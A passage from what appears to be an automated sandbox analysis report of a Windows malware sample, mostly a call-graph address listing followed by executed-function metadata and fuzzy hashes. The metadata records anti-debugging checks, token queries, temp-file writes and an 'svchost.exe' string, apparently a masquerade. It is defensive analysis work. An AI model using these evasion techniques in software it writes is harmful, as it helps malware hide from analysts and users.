20063->19872 20063->19876 20064->20059 20066 7ff795d31db9 20065->20066 20067 7ff795d31d95 20065->20067 20082 7ff795d31ca4 20066->20082 20067->20066 20068 7ff795d31d9a 20067->20068 20070 7ff795d359a4 _errno 68 API calls 20068->20070 20072 7ff795d31d9f 20070->20072 20073 7ff795d347a0 _invalid_parameter_noinfo 16 API calls 20072->20073 20075 7ff795d31daa 20073->20075 20074 7ff795d31dfc 20076 7ff795d359a4 _errno 68 API calls 20074->20076 20075->19887 20077 7ff795d31e01 20076->20077 20078 7ff795d347a0 _invalid_parameter_noinfo 16 API calls 20077->20078 20080 7ff795d31e0c __ascii_stricmp 20078->20080 20079 7ff795d35484 75 API calls _tolower_l 20081 7ff795d31e13 20079->20081 20080->19887 20081->20079 20081->20080 20083 7ff795d31cba 20082->20083 20084 7ff795d31d1b 20082->20084 20090 7ff795d3572c 20083->20090 20084->20074 20084->20081 20087 7ff795d31cf4 20087->20084 20109 7ff795d34ebc 20087->20109 20091 7ff795d35750 _getptd_noexit 68 API calls 20090->20091 20092 7ff795d35737 20091->20092 20093 7ff795d31cbf 20092->20093 20094 7ff795d33e20 _getptd 68 API calls 20092->20094 20093->20087 20095 7ff795d34ac4 20093->20095 20094->20093 20096 7ff795d3572c _getptd 68 API calls 20095->20096 20097 7ff795d34acf 20096->20097 20098 7ff795d34af8 20097->20098 20099 7ff795d34aea 20097->20099 20100 7ff795d3ac78 _lock 68 API calls 20098->20100 20101 7ff795d3572c _getptd 68 API calls 20099->20101 20102 7ff795d34b02 20100->20102 20103 7ff795d34aef 20101->20103 20120 7ff795d34b3c 20102->20120 20107 7ff795d34b30 20103->20107 20108 7ff795d33e20 _getptd 68 API calls 20103->20108 20107->20087 20108->20107 20110 7ff795d3572c _getptd 68 API calls 20109->20110 20111 7ff795d34ecb 20110->20111 20112 7ff795d34ee6 20111->20112 20113 7ff795d3ac78 _lock 68 API calls 20111->20113 20115 7ff795d34f68 20112->20115 20116 7ff795d33e20 _getptd 68 API calls 20112->20116 20118 7ff795d34ef9 20113->20118 20114 7ff795d34f2f 20369 7ff795d3ae60 LeaveCriticalSection 20114->20369 20115->20084 20116->20115 20118->20114 20119 7ff795d3240c free 68 API calls 20118->20119 20119->20114 20121 7ff795d34b16 20120->20121 20122 7ff795d34b4e _initptd _updatetlocinfoEx_nolock 20120->20122 20124 7ff795d3ae60 LeaveCriticalSection 20121->20124 20122->20121 20125 7ff795d34888 20122->20125 20126 7ff795d34924 20125->20126 20128 7ff795d348ab 20125->20128 20127 7ff795d34977 20126->20127 20129 7ff795d3240c free 68 API calls 20126->20129 20149 7ff795d349a4 20127->20149 20193 7ff795d3ba30 20127->20193 20128->20126 20131 7ff795d348ea 20128->20131 20139 7ff795d3240c free 68 API calls 20128->20139 20132 7ff795d34948 20129->20132 20135 7ff795d3490c 20131->20135 20145 7ff795d3240c free 68 API calls 20131->20145 20134 7ff795d3240c free 68 API calls 20132->20134 20140 7ff795d3495c 20134->20140 20136 7ff795d3240c free 68 API calls 20135->20136 20141 7ff795d34918 20136->20141 20137 7ff795d34a02 20138 7ff795d3240c free 68 API calls 20138->20149 20142 7ff795d348de 20139->20142 20144 7ff795d3240c free 68 API calls 20140->20144 20147 7ff795d3240c free 68 API calls 20141->20147 20153 7ff795d3b0ac 20142->20153 20143 7ff795d3240c 68 API calls free 20143->20149 20150 7ff795d3496b 20144->20150 20146 7ff795d34900 20145->20146 20181 7ff795d3b6d8 20146->20181 20147->20126 20149->20137 20149->20143 20152 7ff795d3240c free 68 API calls 20150->20152 20152->20127 20154 7ff795d3b0b5 20153->20154 20179 7ff795d3b1b0 20153->20179 20155 7ff795d3b0cf 20154->20155 20156 7ff795d3240c free 68 API calls 20154->20156 20157 7ff795d3b0e1 20155->20157 20158 7ff795d3240c free 68 API calls 20155->20158 20156->20155 20159 7ff795d3b0f3 20157->20159 20160 7ff795d3240c free 68 API calls 20157->20160 20158->20157 20161 7ff795d3b105 20159->20161 20162 7ff795d3240c free 68 API calls 20159->20162 20160->20159 20163 7ff795d3b117 20161->20163 20165 7ff795d3240c free 68 API calls 20161->20165 20162->20161 20164 7ff795d3b129 20163->20164 20166 7ff795d3240c free 68 API calls 20163->20166 20167 7ff795d3b13b 20164->20167 20168 7ff795d3240c free 68 API calls 20164->20168 20165->20163 20166->20164 20169 7ff795d3b14d 20167->20169 20170 7ff795d3240c free 68 API calls 20167->20170 20168->20167 20171 7ff795d3b15f 20169->20171 20172 7ff795d3240c free 68 API calls 20169->20172 20170->20169 20173 7ff795d3b171 20171->20173 20174 7ff795d3240c free 68 API calls 20171->20174 20172->20171 20175 7ff795d3240c free 68 API calls 20173->20175 20177 7ff795d3b186 20173->20177 20174->20173 20175->20177 20176 7ff795d3b19b 20176->20179 20180 7ff795d3240c free 68 API calls 20176->20180 20177->20176 20178 7ff795d3240c free 68 API calls 20177->20178 20178->20176 20179->20131 20180->20179 20182 7ff795d3b73e 20181->20182 20183 7ff795d3b6dd 20181->20183 20182->20135 20184 7ff795d3b6f6 20183->20184 20185 7ff795d3240c free 68 API calls 20183->20185 20186 7ff795d3b708 20184->20186 20187 7ff795d3240c free 68 API calls 20184->20187 20185->20184 20188 7ff795d3b71a 20186->20188 20189 7ff795d3240c free 68 API calls 20186->20189 20187->20186 20190 7ff795d3b72c 20188->20190 20191 7ff795d3240c free 68 API calls 20188->20191 20189->20188 20190->20182 20192 7ff795d3240c free 68 API calls 20190->20192 20191->20190 20192->20182 20194 7ff795d3ba39 20193->20194 20368 7ff795d34998 20193->20368 20195 7ff795d3240c free 68 API calls 20194->20195 20196 7ff795d3ba4a 20195->20196 20197 7ff795d3240c free 68 API calls 20196->20197 20198 7ff795d3ba53 20197->20198 20199 7ff795d3240c free 68 API calls 20198->20199 20200 7ff795d3ba5c 20199->20200 20201 7ff795d3240c free 68 API calls 20200->20201 20202 7ff795d3ba65 20201->20202 20203 7ff795d3240c free 68 API calls 20202->20203 20204 7ff795d3ba6e 20203->20204 20205 7ff795d3240c free 68 API calls 20204->20205 20206 7ff795d3ba77 20205->20206 20207 7ff795d3240c free 68 API calls 20206->20207 20208 7ff795d3ba7f 20207->20208 20209 7ff795d3240c free 68 API calls 20208->20209 20210 7ff795d3ba88 20209->20210 20211 7ff795d3240c free 68 API calls 20210->20211 20212 7ff795d3ba91 20211->20212 20213 7ff795d3240c free 68 API calls 20212->20213 20214 7ff795d3ba9a 20213->20214 20215 7ff795d3240c free 68 API calls 20214->20215 20216 7ff795d3baa3 20215->20216 20217 7ff795d3240c free 68 API calls 20216->20217 20218 7ff795d3baac 20217->20218 20219 7ff795d3240c free 68 API calls 20218->20219 20220 7ff795d3bab5 20219->20220 20221 7ff795d3240c free 68 API calls 20220->20221 20222 7ff795d3babe 20221->20222 20223 7ff795d3240c free 68 API calls 20222->20223 20224 7ff795d3bac7 20223->20224 20225 7ff795d3240c free 68 API calls 20224->20225 20226 7ff795d3bad0 20225->20226 20227 7ff795d3240c free 68 API calls 20226->20227 20228 7ff795d3badc 20227->20228 20229 7ff795d3240c free 68 API calls 20228->20229 20230 7ff795d3bae8 20229->20230 20231 7ff795d3240c free 68 API calls 20230->20231 20232 7ff795d3baf4 20231->20232 20233 7ff795d3240c free 68 API calls 20232->20233 20234 7ff795d3bb00 20233->20234 20235 7ff795d3240c free 68 API calls 20234->20235 20236 7ff795d3bb0c 20235->20236 20237 7ff795d3240c free 68 API calls 20236->20237 20238 7ff795d3bb18 20237->20238 20239 7ff795d3240c free 68 API calls 20238->20239 20240 7ff795d3bb24 20239->20240 20241 7ff795d3240c free 68 API calls 20240->20241 20242 7ff795d3bb30 20241->20242 20243 7ff795d3240c free 68 API calls 20242->20243 20244 7ff795d3bb3c 20243->20244 20245 7ff795d3240c free 68 API calls 20244->20245 20246 7ff795d3bb48 20245->20246 20247 7ff795d3240c free 68 API calls 20246->20247 20248 7ff795d3bb54 20247->20248 20249 7ff795d3240c free 68 API calls 20248->20249 20250 7ff795d3bb60 20249->20250 20251 7ff795d3240c free 68 API calls 20250->20251 20252 7ff795d3bb6c 20251->20252 20253 7ff795d3240c free 68 API calls 20252->20253 20254 7ff795d3bb78 20253->20254 20255 7ff795d3240c free 68 API calls 20254->20255 20256 7ff795d3bb84 20255->20256 20257 7ff795d3240c free 68 API calls 20256->20257 20258 7ff795d3bb90 20257->20258 20259 7ff795d3240c free 68 API calls 20258->20259 20260 7ff795d3bb9c 20259->20260 20261 7ff795d3240c free 68 API calls 20260->20261 20262 7ff795d3bba8 20261->20262 20263 7ff795d3240c free 68 API calls 20262->20263 20264 7ff795d3bbb4 20263->20264 20265 7ff795d3240c free 68 API calls 20264->20265 20266 7ff795d3bbc0 20265->20266 20267 7ff795d3240c free 68 API calls 20266->20267 20268 7ff795d3bbcc 20267->20268 20269 7ff795d3240c free 68 API calls 20268->20269 20270 7ff795d3bbd8 20269->20270 20271 7ff795d3240c free 68 API calls 20270->20271 20272 7ff795d3bbe4 20271->20272 20273 7ff795d3240c free 68 API calls 20272->20273 20274 7ff795d3bbf0 20273->20274 20275 7ff795d3240c free 68 API calls 20274->20275 20276 7ff795d3bbfc 20275->20276 20277 7ff795d3240c free 68 API calls 20276->20277 20278 7ff795d3bc08 20277->20278 20279 7ff795d3240c free 68 API calls 20278->20279 20280 7ff795d3bc14 20279->20280 20281 7ff795d3240c free 68 API calls 20280->20281 20282 7ff795d3bc20 20281->20282 20283 7ff795d3240c free 68 API calls 20282->20283 20284 7ff795d3bc2c 20283->20284 20285 7ff795d3240c free 68 API calls 20284->20285 20286 7ff795d3bc38 20285->20286 20287 7ff795d3240c free 68 API calls 20286->20287 20288 7ff795d3bc44 20287->20288 20289 7ff795d3240c free 68 API calls 20288->20289 20290 7ff795d3bc50 20289->20290 20291 7ff795d3240c free 68 API calls 20290->20291 20292 7ff795d3bc5c 20291->20292 20293 7ff795d3240c free 68 API calls 20292->20293 20294 7ff795d3bc68 20293->20294 20295 7ff795d3240c free 68 API calls 20294->20295 20296 7ff795d3bc74 20295->20296 20297 7ff795d3240c free 68 API calls 20296->20297 20298 7ff795d3bc80 20297->20298 20299 7ff795d3240c free 68 API calls 20298->20299 20300 7ff795d3bc8c 20299->20300 20301 7ff795d3240c free 68 API calls 20300->20301 20302 7ff795d3bc98 20301->20302 20303 7ff795d3240c free 68 API calls 20302->20303 20304 7ff795d3bca4 20303->20304 20305 7ff795d3240c free 68 API calls 20304->20305 20306 7ff795d3bcb0 20305->20306 20307 7ff795d3240c free 68 API calls 20306->20307 20308 7ff795d3bcbc 20307->20308 20309 7ff795d3240c free 68 API calls 20308->20309 20310 7ff795d3bcc8 20309->20310 20311 7ff795d3240c free 68 API calls 20310->20311 20312 7ff795d3bcd4 20311->20312 20313 7ff795d3240c free 68 API calls 20312->20313 20314 7ff795d3bce0 20313->20314 20315 7ff795d3240c free 68 API calls 20314->20315 20316 7ff795d3bcec 20315->20316 20317 7ff795d3240c free 68 API calls 20316->20317 20318 7ff795d3bcf8 20317->20318 20319 7ff795d3240c free 68 API calls 20318->20319 20320 7ff795d3bd04 20319->20320 20321 7ff795d3240c free 68 API calls 20320->20321 20322 7ff795d3bd10 20321->20322 20323 7ff795d3240c free 68 API calls 20322->20323 20324 7ff795d3bd1c 20323->20324 20325 7ff795d3240c free 68 API calls 20324->20325 20326 7ff795d3bd28 20325->20326 20327 7ff795d3240c free 68 API calls 20326->20327 20328 7ff795d3bd34 20327->20328 20329 7ff795d3240c free 68 API calls 20328->20329 20330 7ff795d3bd40 20329->20330 20331 7ff795d3240c free 68 API calls 20330->20331 20332 7ff795d3bd4c 20331->20332 20333 7ff795d3240c free 68 API calls 20332->20333 20334 7ff795d3bd58 20333->20334 20335 7ff795d3240c free 68 API calls 20334->20335 20336 7ff795d3bd64 20335->20336 20337 7ff795d3240c free 68 API calls 20336->20337 20338 7ff795d3bd70 20337->20338 20339 7ff795d3240c free 68 API calls 20338->20339 20340 7ff795d3bd7c 20339->20340 20341 7ff795d3240c free 68 API calls 20340->20341 20342 7ff795d3bd88 20341->20342 20343 7ff795d3240c free 68 API calls 20342->20343 20344 7ff795d3bd94 20343->20344 20345 7ff795d3240c free 68 API calls 20344->20345 20346 7ff795d3bda0 20345->20346 20347 7ff795d3240c free 68 API calls 20346->20347 20348 7ff795d3bdac 20347->20348 20349 7ff795d3240c free 68 API calls 20348->20349 20350 7ff795d3bdb8 20349->20350 20351 7ff795d3240c free 68 API calls 20350->20351 20352 7ff795d3bdc4 20351->20352 20353 7ff795d3240c free 68 API calls 20352->20353 20354 7ff795d3bdd0 20353->20354 20355 7ff795d3240c free 68 API calls 20354->20355 20356 7ff795d3bddc 20355->20356 20357 7ff795d3240c free 68 API calls 20356->20357 20358 7ff795d3bde8 20357->20358 20359 7ff795d3240c free 68 API calls 20358->20359 20360 7ff795d3bdf4 20359->20360 20361 7ff795d3240c free 68 API calls 20360->20361 20362 7ff795d3be00 20361->20362 20363 7ff795d3240c free 68 API calls 20362->20363 20364 7ff795d3be0c 20363->20364 20365 7ff795d3240c free 68 API calls 20364->20365 20366 7ff795d3be18 20365->20366 20367 7ff795d3240c free 68 API calls 20366->20367 20367->20368 20368->20138 20371 7ff795d1437c 20370->20371 20373 7ff795d13bdf 20370->20373 20374 7ff795d13e50 20371->20374 20373->19643 20375 7ff795d13e7a 20374->20375 20376 7ff795d13ea5 20374->20376 20375->20376 20378 7ff795d13d34 20375->20378 20376->20373 20381 7ff795d13b84 20378->20381 20380 7ff795d13d4b 20380->20376 20384 7ff795d14304 20381->20384 20383 7ff795d13b97 20383->20380 20385 7ff795d14318 SysFreeString 20384->20385 20386 7ff795d14332 20384->20386 20385->20386 20386->20383 20388 7ff795d39eb0 20387->20388 20389 7ff795d359a4 _errno 68 API calls 20388->20389 20390 7ff795d3384e 20388->20390 20391 7ff795d39ed5 20389->20391 20390->19144 20390->19148 20392 7ff795d347a0 _invalid_parameter_noinfo 16 API calls 20391->20392 20392->20390 20398 7ff795d3a3e1 20393->20398 20394 7ff795d3a3e6 20395 7ff795d359a4 _errno 68 API calls 20394->20395 20396 7ff795d339d5 20394->20396 20397 7ff795d3a410 20395->20397 20396->19170 20396->19176 20399 7ff795d347a0 _invalid_parameter_noinfo 16 API calls 20397->20399 20398->20394 20398->20396 20400 7ff795d3a424 20398->20400 20399->20396 20400->20396 20401 7ff795d359a4 _errno 68 API calls 20400->20401 20401->20397 20403 7ff795d3a2df 20402->20403 20405 7ff795d3a2d5 20402->20405 20404 7ff795d359a4 _errno 68 API calls 20403->20404 20410 7ff795d3a2e8 20404->20410 20405->20403 20407 7ff795d3a316 20405->20407 20406 7ff795d347a0 _invalid_parameter_noinfo 16 API calls 20408 7ff795d339ef 20406->20408 20407->20408 20409 7ff795d359a4 _errno 68 API calls 20407->20409 20408->19178 20408->19181 20409->20410 20410->20406 20445 7ff795d3a1c4 20411->20445 20414 7ff795d3a4e9 LoadLibraryExW 20416 7ff795d3a52e GetProcAddress 20414->20416 20417 7ff795d3a506 GetLastError 20414->20417 20415 7ff795d3a5dc IsDebuggerPresent 20418 7ff795d3a5e6 20415->20418 20419 7ff795d3a603 20415->20419 20422 7ff795d3a547 7 API calls 20416->20422 20425 7ff795d3a5f9 20416->20425 20421 7ff795d3a515 LoadLibraryW 20417->20421 20417->20425 20423 7ff795d3a5eb OutputDebugStringW 20418->20423 20424 7ff795d3a5f4 20418->20424 20420 7ff795d3a608 DecodePointer 20419->20420 20419->20424 20420->20425 20421->20416 20421->20425 20422->20415 20426 7ff795d3a5bc GetProcAddress EncodePointer 20422->20426 20423->20424 20424->20425 20427 7ff795d3a634 DecodePointer DecodePointer 20424->20427 20433 7ff795d3a652 20424->20433 20428 7ff795d36bb0 _UnwindNestedFrames 9 API calls 20425->20428 20426->20415 20427->20433 20431 7ff795d3a6ff 20428->20431 20429 7ff795d3a69a DecodePointer 20430 7ff795d3a6ce DecodePointer 20429->20430 20432 7ff795d3a6a5 20429->20432 20430->20425 20431->19189 20432->20430 20434 7ff795d3a6bb DecodePointer 20432->20434 20433->20429 20433->20430 20435 7ff795d3a688 20433->20435 20434->20430 20434->20435 20435->20430 20437 7ff795d36bb9 20436->20437 20438 7ff795d33740 20437->20438 20439 7ff795d38460 IsProcessorFeaturePresent 20437->20439 20438->19190 20440 7ff795d38477 20439->20440 20448 7ff795d3a104 RtlCaptureContext 20440->20448 20446 7ff795d3a1d6 GetModuleHandleW GetProcAddress 20445->20446 20447 7ff795d3a1fc 20445->20447 20446->20447 20447->20414 20447->20415 20449 7ff795d3a11e RtlLookupFunctionEntry 20448->20449 20450 7ff795d3848a 20449->20450 20451 7ff795d3a134 RtlVirtualUnwind 20449->20451 20452 7ff795d38414 IsDebuggerPresent 20450->20452 20451->20449 20451->20450 20453 7ff795d38433 _call_reportfault 20452->20453 20457 7ff795d3a24c SetUnhandledExceptionFilter UnhandledExceptionFilter 20453->20457 20459 7ff795d33dfb ExitProcess 20458->20459 20460 7ff795d33de4 GetProcAddress 20458->20460 20460->20459 20462 7ff795d3ac78 _lock 60 API calls 20461->20462 20463 7ff795d34022 20462->20463 20464 7ff795d34049 DecodePointer 20463->20464 20467 7ff795d34110 doexit 20463->20467 20466 7ff795d34067 DecodePointer 20464->20466 20464->20467 20465 7ff795d34146 20473 7ff795d33e45 20465->20473 20479 7ff795d3ae60 LeaveCriticalSection 20465->20479 20477 7ff795d3408c 20466->20477 20467->20465 20478 7ff795d3ae60 LeaveCriticalSection 20467->20478 20472 7ff795d3409a EncodePointer 20472->20477 20475 7ff795d340ae DecodePointer EncodePointer 20476 7ff795d340c7 DecodePointer DecodePointer 20475->20476 20476->20477 20477->20467 20477->20472 20477->20475

                                                                                        Executed Functions

                                                                                        Function 00007FF795D2FBA0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                        • String ID: GqgWzd$GqgWzd$svchost.exe
                                                                                        • API String ID: 613740775-3706196489
                                                                                        • Opcode ID: 9f5c7b640f57d296efcc2970fc598c3ee78b7c206099d74ffa78a16bb0841733
                                                                                        • Instruction ID: 4be8e0b0342240e6b8245d3b68b3ef9d9d473650f59a5be363fd0d60ca545749
                                                                                        • Opcode Fuzzy Hash: 9f5c7b640f57d296efcc2970fc598c3ee78b7c206099d74ffa78a16bb0841733
                                                                                        • Instruction Fuzzy Hash: 7C51497190C66282F774BB31F99536AA6E0FF84B19F80643AD48E865A8CF3DD109C660
                                                                                        Function 00007FF795D12BEC Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 69filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInitOpenStringUnicodeshared_ptrtype_info::_name_internal_method
                                                                                        • String ID: $0$@$\??\
                                                                                        • API String ID: 3492896725-1644384263
                                                                                        • Opcode ID: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction ID: dcff8b2f2c5d1f58fceab03b75dd1c1508a947969e4cd8304fa3dc89a50f93a1
                                                                                        • Opcode Fuzzy Hash: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction Fuzzy Hash: EC310732219A8496EB60DB24E49439AF7A1F7847A4F904235E79D43BE9EF7CC149CF40
                                                                                        Function 00007FF795D3060C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 434396405-0
                                                                                        • Opcode ID: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction ID: c1205fa116f167cf520fd4c13a40fdd9026ac08b8b64e85850777bd9b150696d
                                                                                        • Opcode Fuzzy Hash: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction Fuzzy Hash: 9031E73661DA5187E760EB25E49462EB7A0F7C5B44F502035EA8E43B68DF3DD805CB50
                                                                                        Function 00007FF795D12D60 Relevance: 7.6, APIs: 5, Instructions: 96filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Temp$ErrorInformationInitLastNameOpenPathStringUnicodeWritetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 3894097367-0
                                                                                        • Opcode ID: c60a68b48e15b36e6a162428543f0853a5545c5fe251748cadc2d8b93848373f
                                                                                        • Instruction ID: 057657d25bc625477b721c4d8afcaf2f1e77e321e6c2f142a124a22af100c5e6
                                                                                        • Opcode Fuzzy Hash: c60a68b48e15b36e6a162428543f0853a5545c5fe251748cadc2d8b93848373f
                                                                                        • Instruction Fuzzy Hash: AC41E832608B818AD760DB65F48435AF7A5F785BA4F805235E6AD83BE8DF7DD144CB00
                                                                                        Function 00007FF795D30150 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3920101602-0
                                                                                        • Opcode ID: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction ID: c5370b7a5ecf0b9244651da93676199b26b30a1acdc37edd1ae56d98ffc2de30
                                                                                        • Opcode Fuzzy Hash: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction Fuzzy Hash: 33F0582090D19285EB716F30E88833EA7E0AB45F0CF806174D58E86298CF3CD509CBB1
                                                                                        Function 00007FF795D12F38 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 3832541453-0
                                                                                        • Opcode ID: 3374a5a794764395d225ce62b5347c57fb9defcd6f270290a06b2f9aa5d2173a
                                                                                        • Instruction ID: 78196047a69e03fe3c98eb3aa314280ab9118d3828b9645bc2d765a513478d50
                                                                                        • Opcode Fuzzy Hash: 3374a5a794764395d225ce62b5347c57fb9defcd6f270290a06b2f9aa5d2173a
                                                                                        • Instruction Fuzzy Hash: D801CC31508A5582D774DB36F48472AB6A0F782BB8F601335F7B906AE8CF3ED4558B10
                                                                                        Function 00007FF795D2DFBC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
                                                                                        • Instruction ID: abbdc47996de22292d5977563e7a93ebc9acb09ab3a95a804d59472770e0db08
                                                                                        • Opcode Fuzzy Hash: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
